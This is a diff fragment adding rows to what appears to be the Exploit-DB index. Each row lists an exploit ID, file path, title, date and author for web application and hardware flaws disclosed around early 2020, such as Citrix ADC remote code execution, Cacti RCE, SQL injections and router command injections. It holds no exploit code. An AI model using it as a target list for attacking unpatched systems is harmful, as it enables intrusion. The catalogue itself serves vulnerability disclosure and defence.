+47814,exploits/php/webapps/47814.txt,"Thrive Smart Home 1.1 - Authentication Bypass",2019-12-30,LiquidWorm,webapps,php,
+47815,exploits/hardware/webapps/47815.txt,"XEROX WorkCentre 7855 Printer - Cross-Site Request Forgery (Add Admin)",2019-12-30,"Ismail Tasdelen",webapps,hardware,
+47816,exploits/hardware/webapps/47816.txt,"XEROX WorkCentre 7830 Printer - Cross-Site Request Forgery (Add Admin)",2019-12-30,"Ismail Tasdelen",webapps,hardware,
+47817,exploits/hardware/webapps/47817.txt,"WEMS BEMS 21.3.1 - Undocumented Backdoor Account",2019-12-30,LiquidWorm,webapps,hardware,
+47819,exploits/hardware/webapps/47819.txt,"AVE DOMINAplus 1.10.x - Credential Disclosure",2019-12-30,LiquidWorm,webapps,hardware,
+47820,exploits/hardware/webapps/47820.txt,"AVE DOMINAplus 1.10.x - Unauthenticated Remote Reboot",2019-12-30,LiquidWorm,webapps,hardware,
+47821,exploits/hardware/webapps/47821.txt,"AVE DOMINAplus 1.10.x - Cross-Site Request Forgery (enable/disable alarm)",2019-12-30,LiquidWorm,webapps,hardware,
+47822,exploits/hardware/webapps/47822.txt,"AVE DOMINAplus 1.10.x - Authentication Bypass",2019-12-30,LiquidWorm,webapps,hardware,
+47823,exploits/hardware/webapps/47823.txt,"Heatmiser Netmonitor 3.03 - Hardcoded Credentials",2019-12-30,"Ismail Tasdelen",webapps,hardware,
+47824,exploits/hardware/webapps/47824.txt,"MyDomoAtHome REST API Domoticz ISS Gateway 0.2.40 - Information Disclosure",2019-12-30,LiquidWorm,webapps,hardware,
+47826,exploits/hardware/webapps/47826.txt,"RICOH SP 4510SF Printer - HTML Injection",2019-12-30,"Ismail Tasdelen",webapps,hardware,
+47827,exploits/hardware/webapps/47827.txt,"RICOH Web Image Monitor 1.09 - HTML Injection",2019-12-30,"Ismail Tasdelen",webapps,hardware,
+47828,exploits/hardware/webapps/47828.txt,"Heatmiser Netmonitor 3.03 - HTML Injection",2019-12-30,"Ismail Tasdelen",webapps,hardware,
+47832,exploits/php/webapps/47832.py,"Wordpress Ultimate Addons for Beaver Builder 1.2.4.1 - Authentication Bypass",2019-12-31,"Raphael Karger",webapps,php,
+47834,exploits/php/webapps/47834.py,"Shopping Portal ProVersion 3.0 - Authentication Bypass",2020-01-01,"Metin Yunus Kandemir",webapps,php,
+47835,exploits/hardware/webapps/47835.txt,"IBM InfoPrint 4247-Z03 Impact Matrix Printer - Directory Traversal",2020-01-01,"Raif Berkay Dincel",webapps,hardware,
+47836,exploits/php/webapps/47836.py,"Hospital Management System 4.0 - Authentication Bypass",2020-01-01,"Metin Yunus Kandemir",webapps,php,
+47840,exploits/php/webapps/47840.txt,"Hospital Management System 4.0 - 'searchdata' SQL Injection",2020-01-02,FULLSHADE,webapps,php,
+47841,exploits/php/webapps/47841.txt,"Hospital Management System 4.0 - Persistent Cross-Site Scripting",2020-01-02,FULLSHADE,webapps,php,
+47842,exploits/php/webapps/47842.txt,"BloodX 1.0 - Authentication Bypass",2020-01-02,riamloo,webapps,php,
+47843,exploits/php/webapps/47843.txt,"Online Course Registration 2.0 - Remote Code Execution",2020-01-03,"Metin Yunus Kandemir",webapps,php,
+47844,exploits/php/webapps/47844.txt,"Karakuzu ERP Management Web 5.7.0 - 'k_adi_duz' SQL Injection",2020-01-03,"Hakan TAŞKÖPRÜ",webapps,php,
+47846,exploits/php/webapps/47846.txt,"Dairy Farm Shop Management System 1.0 - 'username' SQL Injection",2020-01-06,"Chris Inzinga",webapps,php,
+47847,exploits/php/webapps/47847.txt,"Complaint Management System 4.0 - 'cid' SQL injection",2020-01-06,FULLSHADE,webapps,php,
+47850,exploits/hardware/webapps/47850.txt,"IBM RICOH Infoprint 1532 Printer - Persistent Cross-Site Scripting",2020-01-06,"Ismail Tasdelen",webapps,hardware,
+47851,exploits/php/webapps/47851.txt,"Subrion CMS 4.0.5 - Cross-Site Request Forgery (Add Admin)",2020-01-06,"Ismail Tasdelen",webapps,php,
+47854,exploits/php/webapps/47854.txt,"Hostel Management System 2.0 - 'id' SQL Injection",2020-01-06,FULLSHADE,webapps,php,
+47858,exploits/php/webapps/47858.txt,"elaniin CMS 1.0 - Authentication Bypass",2020-01-06,riamloo,webapps,php,
+47874,exploits/php/webapps/47874.txt,"Small CRM 2.0 - Authentication Bypass",2020-01-06,FULLSHADE,webapps,php,
+47875,exploits/php/webapps/47875.txt,"Voyager 1.3.0 - Directory Traversal",2020-01-06,NgoAnhDuc,webapps,php,
+47876,exploits/php/webapps/47876.txt,"Codoforum 4.8.3 - Persistent Cross-Site Scripting",2020-01-06,Prasanth,webapps,php,
+47879,exploits/python/webapps/47879.md,"Django < 3.0 < 2.2 < 1.11 - Account Hijack",2019-12-24,"Ryuji Tsutsui",webapps,python,
+47881,exploits/php/webapps/47881.py,"Job Portal 1.0 - Remote Code Execution",2020-01-07,Tib3rius,webapps,php,
+47882,exploits/hardware/webapps/47882.txt,"piSignage 2.6.4 - Directory Traversal",2020-01-07,"JunYeong Ko",webapps,hardware,
+47884,exploits/php/webapps/47884.py,"Complaint Management System 4.0 - Remote Code Execution",2020-01-07,"Metin Yunus Kandemir",webapps,php,
+47886,exploits/php/webapps/47886.txt,"Codoforum 4.8.3 - 'input_txt' Persistent Cross-Site Scripting",2020-01-08,"Vyshnav nk",webapps,php,
+47887,exploits/php/webapps/47887.py,"Online Book Store 1.0 - Unauthenticated Remote Code Execution",2020-01-08,Tib3rius,webapps,php,
+47892,exploits/java/webapps/47892.txt,"Tomcat proprietaryEvaluate 9.0.0.M1 - Sandbox Escape",2020-01-08,hantwister,webapps,java,
+47893,exploits/hardware/webapps/47893.js,"Sony Playstation 4 (PS4) < 6.72 - WebKit Code Execution (PoC)",2019-12-31,"TJ Corley",webapps,hardware,
+47895,exploits/java/webapps/47895.py,"Oracle Weblogic 10.3.6.0.0 - Remote Command Execution",2020-01-09,james,webapps,java,
+47898,exploits/php/webapps/47898.py,"Pandora 7.0NG - Remote Code Execution",2020-01-10,Askar,webapps,php,
+47899,exploits/php/webapps/47899.py,"PixelStor 5000 K:4.0.1580-20150629 - Remote Code Execution",2020-01-10,.:UND3R:.,webapps,php,
+47900,exploits/linux/webapps/47900.txt,"ASTPP 4.0.1 VoIP Billing - Database Backup Download",2020-01-10,"Fabien AUNAY",webapps,linux,
+47901,exploits/multiple/webapps/47901.sh,"Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution (PoC)",2020-01-11,"Project Zero India",webapps,multiple,
+47902,exploits/multiple/webapps/47902.py,"Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution",2020-01-11,TrustedSec,webapps,multiple,
+47903,exploits/php/webapps/47903.py,"Chevereto 3.13.4 Core - Remote Code Execution",2020-01-13,"Jinny Ramsmark",webapps,php,
+47913,exploits/multiple/webapps/47913.rb,"Citrix Application Delivery Controller and Gateway 10.5 - Remote Code Execution (Metasploit)",2020-01-13,mekhalleh,webapps,multiple,
+47914,exploits/php/webapps/47914.txt,"Digi AnywhereUSB 14 - Reflective Cross-Site Scripting",2020-01-13,"Raspina Net Pars Group",webapps,php,
+47917,exploits/hardware/webapps/47917.txt,"IBM RICOH InfoPrint 6500 Printer - HTML Injection",2020-01-14,"Ismail Tasdelen",webapps,hardware,
+47918,exploits/hardware/webapps/47918.txt,"IBM RICOH 6400 Printer - HTML Injection",2020-01-14,"Ismail Tasdelen",webapps,hardware,
+47922,exploits/php/webapps/47922.txt,"Online Book Store 1.0 -  'bookisbn' SQL Injection",2020-01-15,"Ertebat Gostar Co",webapps,php,
+47923,exploits/hardware/webapps/47923.rb,"Huawei HG255 - Directory Traversal ( Metasploit )",2020-01-15,"Ismail Tasdelen",webapps,hardware,
+47925,exploits/php/webapps/47925.txt,"WordPress Plugin Postie 1.9.40 - Persistent Cross-Site Scripting",2020-01-16,V1n1v131r4,webapps,php,
+47926,exploits/php/webapps/47926.txt,"Rukovoditel Project Management CRM 2.5.2 - 'reports_id' SQL Injection",2020-01-16,"Fatih Çelik",webapps,php,
+47927,exploits/java/webapps/47927.txt,"Jenkins Gitlab Hook Plugin 1.4.2 - Reflected Cross-Site Scripting",2020-01-16,"Ai Ho",webapps,java,
+47928,exploits/php/webapps/47928.txt,"Online Book Store 1.0 - Arbitrary File Upload",2020-01-16,Or4nG.M4N,webapps,php,
+47929,exploits/multiple/webapps/47929.rb,"Tautulli 2.1.9 - Denial of Service ( Metasploit )",2020-01-16,"Ismail Tasdelen",webapps,multiple,
+47930,exploits/multiple/webapps/47930.txt,"Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal",2020-01-16,"Dhiraj Mishra",webapps,multiple,
+47931,exploits/php/webapps/47931.txt,"Rukovoditel Project Management CRM 2.5.2 - 'entities_id' SQL Injection",2020-01-16,"Fatih Çelik",webapps,php,
+47934,exploits/php/webapps/47934.txt,"Rukovoditel Project Management CRM 2.5.2 - 'filters' SQL Injection",2020-01-16,"Fatih Çelik",webapps,php,
+47939,exploits/php/webapps/47939.py,"Wordpress Plugin InfiniteWP Client 1.9.4.5 - Authentication Bypass",2020-01-17,"Raphael Karger",webapps,php,
+47941,exploits/php/webapps/47941.py,"Wordpress Time Capsule Plugin 1.21.16 - Authentication Bypass",2020-01-17,"B. Canavate",webapps,php,
+47946,exploits/php/webapps/47946.txt,"Adive Framework 2.0.8 - Persistent Cross-Site Scripting",2020-01-20,"Sarthak Saini",webapps,php,
+47948,exploits/php/webapps/47948.rb,"Centreon 19.04 - Authenticated Remote Code Execution (Metasploit)",2020-01-20,TheCyberGeek,webapps,php,
+47949,exploits/java/webapps/47949.txt,"ManageEngine Network Configuration Manager 12.2 - 'apiKey' SQL Injection",2020-01-21,"Ertebat Gostar Co",webapps,java,80
+47954,exploits/php/webapps/47954.py,"qdPM 9.1 - Remote Code Execution",2020-01-23,"Rishal Dwivedi",webapps,php,
+47951,exploits/xml/webapps/47951.py,"Citrix XenMobile Server 10.8 - XML External Entity Injection",2020-01-22,"Jonas Lejon",webapps,xml,
+47958,exploits/hardware/webapps/47958.txt,"TP-Link TP-SG105E 1.0.0 - Unauthenticated Remote Reboot",2020-01-24,PCEumel,webapps,hardware,
+47959,exploits/php/webapps/47959.txt,"Webtareas 2.0 - 'id' SQL Injection",2020-01-24,Greg.Priest,webapps,php,80
+47960,exploits/asp/webapps/47960.txt,"OLK Web Store 2020 - Cross-Site Request Forgery",2020-01-24,"Joel Aviad Ossi",webapps,asp,80
+47961,exploits/hardware/webapps/47961.txt,"Genexis Platinum-4410 2.1 - Authentication Bypass",2020-01-24,"Husinul Sanub",webapps,hardware,
+47966,exploits/php/webapps/47966.txt,"Adive Framework 2.0.8 - Cross-Site Request Forgery (Change Admin Password)",2020-01-28,"Sarthak Saini",webapps,php,
+47967,exploits/php/webapps/47967.txt,"Octeth Oempro 4.8 - 'CampaignID' SQL Injection",2020-01-28,"Bruno de Barros Bulle",webapps,php,80
+47968,exploits/php/webapps/47968.txt,"Centreon 19.10.5 - Database Credentials Disclosure",2020-01-28,"Fabien AUNAY",webapps,php,
+47969,exploits/php/webapps/47969.txt,"Centreon 19.10.5 - Remote Command Execution",2020-01-28,"Fabien AUNAY",webapps,php,
+47971,exploits/windows/webapps/47971.txt,"Kibana 6.6.1 - CSV Injection",2020-01-29,"Aamir Rehman",webapps,windows,
+47972,exploits/java/webapps/47972.txt,"Liferay CE Portal 6.0.2 - Remote Command Execution",2020-01-29,"Berk Dusunur",webapps,java,
+47973,exploits/php/webapps/47973.txt,"Cups Easy 1.0 - Cross Site Request Forgery (Password Reset)",2020-01-29,J3rryBl4nks,webapps,php,
+47976,exploits/hardware/webapps/47976.py,"Satellian 1.12 - Remote Code Execution",2020-01-29,Xh4H,webapps,hardware,
+47977,exploits/php/webapps/47977.txt,"Centreon 19.10.5 - 'Pollers' Remote Command Execution",2020-01-29,"Omri Baso",webapps,php,
+47978,exploits/php/webapps/47978.txt,"Centreon 19.10.5 - 'centreontrapd' Remote Command Execution",2020-01-29,"Fabien AUNAY",webapps,php,
+47979,exploits/hardware/webapps/47979.txt,"Fifthplay S.A.M.I 2019.2_HP - Persistent Cross-Site Scripting",2020-01-29,LiquidWorm,webapps,hardware,
+47982,exploits/php/webapps/47982.py,"rConfig 3.9.3 - Authenticated Remote Code Execution",2020-01-30,vikingfr,webapps,php,
+47985,exploits/php/webapps/47985.txt,"Lotus Core CMS 1.0.1 - Local File Inclusion",2020-01-31,"Daniel Monzón",webapps,php,
+47986,exploits/php/webapps/47986.txt,"FlexNet Publisher 11.12.1 - Cross-Site Request Forgery (Add Local Admin)",2020-01-31,"Ismail Tasdelen",webapps,php,
+47988,exploits/php/webapps/47988.txt,"IceWarp WebMail 11.4.4.1 - Reflective Cross-Site Scripting",2020-02-03,"Lutfu Mert Ceylan",webapps,php,
+47989,exploits/php/webapps/47989.php,"phpList 3.5.0 - Authentication Bypass",2020-02-03,"Suvadip Kar",webapps,php,
+47990,exploits/java/webapps/47990.py,"Jira 8.3.4 - Information Disclosure (Username Enumeration)",2020-02-03,"Mufeed VH",webapps,java,
+47991,exploits/hardware/webapps/47991.py,"Schneider Electric U.Motion Builder 1.3.4 - Authenticated Command Injection",2020-02-03,"Cosmin Craciun",webapps,hardware,
+47992,exploits/php/webapps/47992.txt,"School ERP System 1.0 - Cross Site Request Forgery (Add Admin)",2020-02-03,J3rryBl4nks,webapps,php,
+47994,exploits/php/webapps/47994.rb,"Centreon 19.10.5 - 'Pollers' Remote Command Execution (Metasploit)",2020-02-04,mekhalleh,webapps,php,
+47996,exploits/linux/webapps/47996.py,"F-Secure Internet Gatekeeper 5.40 - Heap Overflow (PoC)",2020-02-04,"Kevin Joensen",webapps,linux,
+47997,exploits/json/webapps/47997.txt,"AVideo Platform 8.1 - Information Disclosure (User Enumeration)",2020-02-05,"Ihsan Sencan",webapps,json,
+47998,exploits/hardware/webapps/47998.rb,"Wago PFC200 - Authenticated Remote Code Execution (Metasploit)",2020-02-05,0x483d,webapps,hardware,
+48001,exploits/java/webapps/48001.py,"Kronos WebTA 4.0 - Authenticated Remote Privilege Escalation",2020-02-05,nxkennedy,webapps,java,
+48002,exploits/json/webapps/48002.py,"Verodin Director Web Console 3.5.4.0 - Remote Authenticated Password Disclosure (PoC)",2020-02-05,nxkennedy,webapps,json,
+48003,exploits/json/webapps/48003.txt,"AVideo Platform 8.1 - Cross Site Request Forgery (Password Reset)",2020-02-05,"Ihsan Sencan",webapps,json,
+48007,exploits/php/webapps/48007.txt,"Online Job Portal 1.0 - 'user_email' SQL Injection",2020-02-06,"Ihsan Sencan",webapps,php,
+48012,exploits/php/webapps/48012.txt,"Online Job Portal 1.0 - Remote Code Execution",2020-02-06,"Ihsan Sencan",webapps,php,
+48016,exploits/php/webapps/48016.txt,"Online Job Portal 1.0 - Cross Site Request Forgery (Add User)",2020-02-06,"Ihsan Sencan",webapps,php,
+48017,exploits/php/webapps/48017.php,"Ecommerce Systempay 1.0 - Production KEY Brute Force",2020-02-06,live3,webapps,php,
+48018,exploits/java/webapps/48018.py,"Cisco Data Center Network Manager 11.2 - Remote Code Execution",2020-02-06,mr_me,webapps,java,
+48019,exploits/java/webapps/48019.py,"Cisco Data Center Network Manager 11.2.1 - 'getVmHostData' SQL Injection",2020-02-06,mr_me,webapps,java,
+48020,exploits/java/webapps/48020.py,"Cisco Data Center Network Manager 11.2.1 - 'LanFabricImpl' Command Injection",2020-02-06,mr_me,webapps,java,
+48022,exploits/php/webapps/48022.txt,"QuickDate 1.3.2 - SQL Injection",2020-02-07,"Ihsan Sencan",webapps,php,
+48024,exploits/php/webapps/48024.txt,"PackWeb Formap E-learning 1.0 - 'NumCours' SQL Injection",2020-02-07,"Amel BOUZIANE-LEBLOND",webapps,php,
+48025,exploits/php/webapps/48025.txt,"EyesOfNetwork 5.3 - Remote Code Execution",2020-02-07,"Clément Billac",webapps,php,
+48026,exploits/xml/webapps/48026.txt,"ExpertGPS 6.38 - XML External Entity Injection",2020-02-07,"Trent Gordon",webapps,xml,
+48027,exploits/multiple/webapps/48027.txt,"Google Invisible RECAPTCHA 3 - Spoof Bypass",2020-02-07,Matamorphosis,webapps,multiple,
+48029,exploits/multiple/webapps/48029.txt,"Forcepoint WebSecurity 8.5 - Reflective Cross-Site Scripting",2020-02-10,"Prasenjit Kanti Paul",webapps,multiple,
+48030,exploits/php/webapps/48030.txt,"LearnDash WordPress LMS Plugin 3.1.2 - Reflective Cross-Site Scripting",2020-02-10,"Jinson Varghese Behanan",webapps,php,
+48040,exploits/cgi/webapps/48040.txt,"CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting",2020-02-11,Luca.Chiou,webapps,cgi,
+48042,exploits/php/webapps/48042.txt,"Vanilla Forums 2.6.3 - Persistent Cross-Site Scripting",2020-02-11,"Sayak Naskar",webapps,php,
+48047,exploits/php/webapps/48047.rb,"WordPress InfiniteWP - Client Authentication Bypass (Metasploit)",2020-02-11,Metasploit,webapps,php,80
+48066,exploits/php/webapps/48066.txt,"phpMyChat Plus 1.98 - 'pmc_username' SQL Injection",2020-02-14,J3rryBl4nks,webapps,php,
+48064,exploits/php/webapps/48064.py,"PANDORAFMS 7.0 - Authenticated Remote Code Execution",2020-02-13,"Engin Demirbilek",webapps,php,
+48074,exploits/php/webapps/48074.txt,"SOPlanning 1.45 - 'by' SQL Injection",2020-02-17,J3rryBl4nks,webapps,php,
+48076,exploits/php/webapps/48076.txt,"Wordpress Plugin Strong Testimonials 2.40.1 - Persistent Cross-Site Scripting",2020-02-17,"Jinson Varghese Behanan",webapps,php,
+48077,exploits/hardware/webapps/48077.txt,"Avaya Aura Communication Manager 5.2 - Remote Code Execution",2020-02-17,"Sarang Tumne",webapps,hardware,
+48082,exploits/php/webapps/48082.txt,"Ice HRM 26.2.0 - Cross-Site Request Forgery (Add User)",2020-02-17,J3rryBl4nks,webapps,php,
+48083,exploits/php/webapps/48083.txt,"WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting",2020-02-17,"Ultra Security Team",webapps,php,
+48086,exploits/php/webapps/48086.txt,"SOPlanning 1.45 - Cross-Site Request Forgery (Add User)",2020-02-17,J3rryBl4nks,webapps,php,
+48089,exploits/php/webapps/48089.txt,"SOPlanning 1.45 - 'users' SQL Injection",2020-02-17,J3rryBl4nks,webapps,php,
+48090,exploits/java/webapps/48090.py,"LabVantage 8.3 - Information Disclosure",2020-02-17,"Joel Aviad Ossi",webapps,java,
+48094,exploits/php/webapps/48094.py,"Virtual Freer 1.58 - Remote Command Execution",2020-02-19,SajjadBnd,webapps,php,
+48095,exploits/hardware/webapps/48095.pl,"DBPower C300 HD Camera - Remote Configuration Disclosure",2020-02-19,"Todor Donev",webapps,hardware,
+48098,exploits/hardware/webapps/48098.py,"Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak",2020-02-19,byteGoblin,webapps,hardware,
+48099,exploits/php/webapps/48099.txt,"Easy2Pilot 7 - Cross-Site Request Forgery (Add User)",2020-02-20,indoushka,webapps,php,
+48105,exploits/hardware/webapps/48105.txt,"Avaya IP Office Application Server 11.0.0.0 - Reflective Cross-Site Scripting",2020-02-24,"Scott Goodwin",webapps,hardware,
+48106,exploits/php/webapps/48106.txt,"GUnet OpenEclass E-learning platform 1.7.3 - 'uname' SQL Injection",2020-02-24,emaragkos,webapps,php,
+48107,exploits/hardware/webapps/48107.pl,"ESCAM QD-900 WIFI HD Camera - Remote Configuration Disclosure",2020-02-24,"Todor Donev",webapps,hardware,
+48108,exploits/multiple/webapps/48108.txt,"Real Web Pentesting Tutorial Step by Step - [Persian]",2020-02-24,"Meisam Monsef",webapps,multiple,
+48109,exploits/php/webapps/48109.txt,"AMSS++ v 4.31 - 'id' SQL Injection",2020-02-24,indoushka,webapps,php,
+48110,exploits/hardware/webapps/48110.txt,"SecuSTATION IPCAM-130 HD Camera - Remote Configuration Disclosure",2020-02-24,"Todor Donev",webapps,hardware,
+48113,exploits/php/webapps/48113.txt,"CandidATS 2.1.0 - Cross-Site Request Forgery (Add Admin)",2020-02-24,J3rryBl4nks,webapps,php,
+48114,exploits/php/webapps/48114.txt,"AMSS++ 4.7 - Backdoor Admin Account",2020-02-24,indoushka,webapps,php,
+48115,exploits/hardware/webapps/48115.pl,"SecuSTATION SC-831 HD Camera - Remote Configuration Disclosure",2020-02-24,"Todor Donev",webapps,hardware,
+48117,exploits/php/webapps/48117.txt,"ATutor 2.2.4 - 'id' SQL Injection",2020-02-24,"Andrey Stoykov",webapps,php,
+48118,exploits/hardware/webapps/48118.txt,"I6032B-P POE 2.0MP Outdoor Camera - Remote Configuration Disclosure",2020-02-24,"Todor Donev",webapps,hardware,
+48119,exploits/java/webapps/48119.txt,"ManageEngine EventLog Analyzer 10.0 - Information Disclosure",2020-02-24,"Scott Goodwin",webapps,java,
+48122,exploits/php/webapps/48122.txt,"eLection 2.0 - 'id' SQL Injection",2020-02-24,J3rryBl4nks,webapps,php,
+48124,exploits/aspx/webapps/48124.txt,"DotNetNuke 9.5 - Persistent Cross-Site Scripting",2020-02-24,"Sajjad Pourali",webapps,aspx,
+48125,exploits/aspx/webapps/48125.txt,"DotNetNuke 9.5 - File Upload Restrictions Bypass",2020-02-24,"Sajjad Pourali",webapps,aspx,
+48127,exploits/hardware/webapps/48127.pl,"Aptina AR0130 960P 1.3MP Camera - Remote Configuration Disclosure",2020-02-24,"Todor Donev",webapps,hardware,
+48128,exploits/php/webapps/48128.py,"Cacti 1.2.8 - Remote Code Execution",2020-02-24,Askar,webapps,php,
+48134,exploits/php/webapps/48134.php,"WordPress Plugin WooCommerce CardGate Payment Gateway 3.1.15 - Payment Process Bypass",2020-02-25,GeekHack,webapps,php,
+48135,exploits/php/webapps/48135.php,"Magento WooCommerce CardGate Payment Gateway 2.0.30 - Payment Process Bypass",2020-02-25,GeekHack,webapps,php,
+48138,exploits/php/webapps/48138.txt,"PhpIX 2012 Professional - 'id' SQL Injection",2020-02-26,indoushka,webapps,php,
+48141,exploits/php/webapps/48141.txt,"Business Live Chat Software 1.0 - Cross-Site Request Forgery (Add Admin)",2020-02-27,"Meisam Monsef",webapps,php,
+48142,exploits/hardware/webapps/48142.txt,"Comtrend VR-3033 - Command Injection",2020-02-27,"Raki Ben Hamouda",webapps,hardware,
+48143,exploits/multiple/webapps/48143.py,"Apache Tomcat - AJP 'Ghostcat File Read/Inclusion",2020-02-20,YDHCUI,webapps,multiple,
+48144,exploits/multiple/webapps/48144.py,"Cacti 1.2.8 - Authenticated  Remote Code Execution",2020-02-03,Askar,webapps,multiple,
+48145,exploits/multiple/webapps/48145.py,"Cacti 1.2.8 - Unauthenticated Remote Code Execution",2020-02-03,Askar,webapps,multiple,
+48146,exploits/multiple/webapps/48146.py,"qdPM < 9.1 - Remote Code Execution",2020-02-28,"Tobin Shields",webapps,multiple,
+48147,exploits/multiple/webapps/48147.txt,"Joplin Desktop 1.0.184 - Cross-Site Scripting",2020-03-02,"Javier Olmedo",webapps,multiple,
+48149,exploits/hardware/webapps/48149.py,"Netis WF2419 2.2.36123 - Remote Code Execution",2020-03-02,"Elias Issa",webapps,hardware,
+48151,exploits/php/webapps/48151.txt,"Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery (Add User)",2020-03-02,"Jinson Varghese Behanan",webapps,php,
+48152,exploits/hardware/webapps/48152.txt,"TL-WR849N 0.9.1 4.16 - Authentication Bypass (Upload Firmware)",2020-03-02,"Elber Tavares",webapps,hardware,
+48154,exploits/multiple/webapps/48154.sh,"Wing FTP Server 6.2.5 - Privilege Escalation",2020-03-02,"Cary Hooper",webapps,multiple,
+48155,exploits/hardware/webapps/48155.py,"TP LINK TL-WR849N - Remote Code Execution",2020-03-02,"Elber Tavares",webapps,hardware,
+48158,exploits/hardware/webapps/48158.txt,"Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload)",2020-03-02,"Elber Tavares",webapps,hardware,
+48159,exploits/php/webapps/48159.rb,"Cacti v1.2.8 - Unauthenticated Remote Code Execution (Metasploit)",2020-03-02,"Lucas Amorim",webapps,php,
+48161,exploits/hardware/webapps/48161.txt,"RICOH Aficio SP 5200S Printer - 'entryNameIn' HTML Injection",2020-03-03,"Paulina Girón",webapps,hardware,
+48162,exploits/php/webapps/48162.txt,"Alfresco 5.2.4 - Persistent Cross-Site Scripting",2020-03-03,"Alexandre ZANNI",webapps,php,
+48163,exploits/php/webapps/48163.txt,"GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection",2020-03-03,emaragkos,webapps,php,
+48164,exploits/hardware/webapps/48164.txt,"RICOH Aficio SP 5210SF Printer - 'entryNameIn' HTML Injection",2020-03-03,"Olga Villagran",webapps,hardware,
+48166,exploits/php/webapps/48166.txt,"UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read",2020-03-04,NgoAnhDuc,webapps,php,
+48176,exploits/multiple/webapps/48176.py,"ManageEngine Desktop Central - 'FileStorage getChartImage' Deserialization / Unauthenticated Remote Code Execution",2019-12-12,mr_me,webapps,multiple,
+48179,exploits/php/webapps/48179.txt,"Sentrifugo HRMS 3.2 - 'id' SQL Injection",2020-03-09,minhnb,webapps,php,
+48188,exploits/java/webapps/48188.txt,"Sysaid 20.1.11 b26 - Remote Command Execution",2020-03-10,"Ahmed Sherif",webapps,java,
+48189,exploits/php/webapps/48189.txt,"YzmCMS 5.5 - 'url' Persistent Cross-Site Scripting",2020-03-10,En_dust,webapps,php,
+48190,exploits/php/webapps/48190.txt,"Persian VIP Download Script 1.0 - 'active' SQL Injection",2020-03-10,S3FFR,webapps,php,
+48197,exploits/php/webapps/48197.txt,"Wordpress Plugin Search Meter 2.13.2 - CSV injection",2020-03-11,"Daniel Monzón",webapps,php,
+48202,exploits/php/webapps/48202.txt,"Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection",2020-03-12,"Milad karimi",webapps,php,
+48203,exploits/java/webapps/48203.txt,"WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure",2020-03-12,"RedTeam Pentesting GmbH",webapps,java,
+48204,exploits/php/webapps/48204.txt,"Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection",2020-03-12,"Daniel Monzón",webapps,php,
+48205,exploits/php/webapps/48205.txt,"HRSALE 1.1.8 - Cross-Site Request Forgery (Add Admin)",2020-03-12,"Ismail Akıcı",webapps,php,
+48207,exploits/php/webapps/48207.py,"rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution",2020-03-12,"Engin Demirbilek",webapps,php,
+48208,exploits/php/webapps/48208.py,"rConfig 3.9 - 'searchColumn' SQL Injection",2020-03-12,vikingfr,webapps,php,
+48209,exploits/php/webapps/48209.py,"Horde Groupware Webmail Edition 5.2.22 - PHP File Inclusion",2020-03-11,"Andrea Cardaci",webapps,php,
+48210,exploits/php/webapps/48210.py,"Horde Groupware Webmail Edition 5.2.22 - PHAR Loading",2020-03-11,"Andrea Cardaci",webapps,php,
+48212,exploits/linux/webapps/48212.txt,"Centos WebPanel 7 - 'term' SQL Injection",2020-03-13,"Berke YILMAZ",webapps,linux,
+48215,exploits/php/webapps/48215.sh,"Horde Groupware Webmail Edition 5.2.22 - Remote Code Execution",2020-03-10,"Andrea Cardaci",webapps,php,
+48217,exploits/asp/webapps/48217.txt,"Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)",2020-03-16,"Miguel Mendez Z",webapps,asp,
+48218,exploits/php/webapps/48218.txt,"MiladWorkShop VIP System 1.0 - 'lang' SQL Injection",2020-03-16,"AYADI Mohamed",webapps,php,
+48219,exploits/php/webapps/48219.py,"PHPKB Multi-Language 9 - Authenticated Remote Code Execution",2020-03-16,"Antonio Cannito",webapps,php,
+48220,exploits/php/webapps/48220.py,"PHPKB Multi-Language 9 - Authenticated Directory Traversal",2020-03-16,"Antonio Cannito",webapps,php,
+48221,exploits/php/webapps/48221.py,"PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution",2020-03-16,"Antonio Cannito",webapps,php,
+48225,exploits/hardware/webapps/48225.txt,"Netlink GPON Router 1.0.11 - Remote Code Execution",2020-03-18,shellord,webapps,hardware,
+48234,exploits/php/webapps/48234.txt,"Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)",2020-03-20,"Metin Yunus Kandemir",webapps,php,
+48240,exploits/multiple/webapps/48240.txt,"FIBARO System Home Center 5.021 - Remote File Include",2020-03-23,LiquidWorm,webapps,multiple,
+48241,exploits/php/webapps/48241.py,"rConfig 3.9.4 - 'search.crud.php' Remote Command Injection",2020-03-23,"Matthew Aberegg",webapps,php,
+48242,exploits/php/webapps/48242.txt,"Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection",2020-03-23,qw3rTyTy,webapps,php,
+48244,exploits/php/webapps/48244.txt,"UliCMS 2020.1 - Persistent Cross-Site Scripting",2020-03-24,SunCSR,webapps,php,
+48245,exploits/php/webapps/48245.txt,"Wordpress Plugin WPForms 1.5.8.2 - Persistent Cross-Site Scripting",2020-03-24,"Jinson Varghese Behanan",webapps,php,
+48247,exploits/hardware/webapps/48247.py,"UCM6202 1.0.18.13 - Remote Command Injection",2020-03-24,"Jacob Baines",webapps,hardware,
+48248,exploits/php/webapps/48248.txt,"Joomla! Component GMapFP 3.30 - Arbitrary File Upload",2020-03-25,ThelastVvV,webapps,php,
+48250,exploits/php/webapps/48250.txt,"LeptonCMS 4.5.0 - Persistent Cross-Site Scripting",2020-03-25,SunCSR,webapps,php,
+48255,exploits/hardware/webapps/48255.py,"TP-Link Archer C50 3 - Denial of Service (PoC)",2020-03-26,thewhiteh4t,webapps,hardware,
